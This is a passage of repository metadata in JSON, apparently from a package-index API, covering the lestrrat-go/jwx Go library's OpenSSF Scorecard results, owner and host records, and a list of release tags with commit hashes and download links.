.github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","ki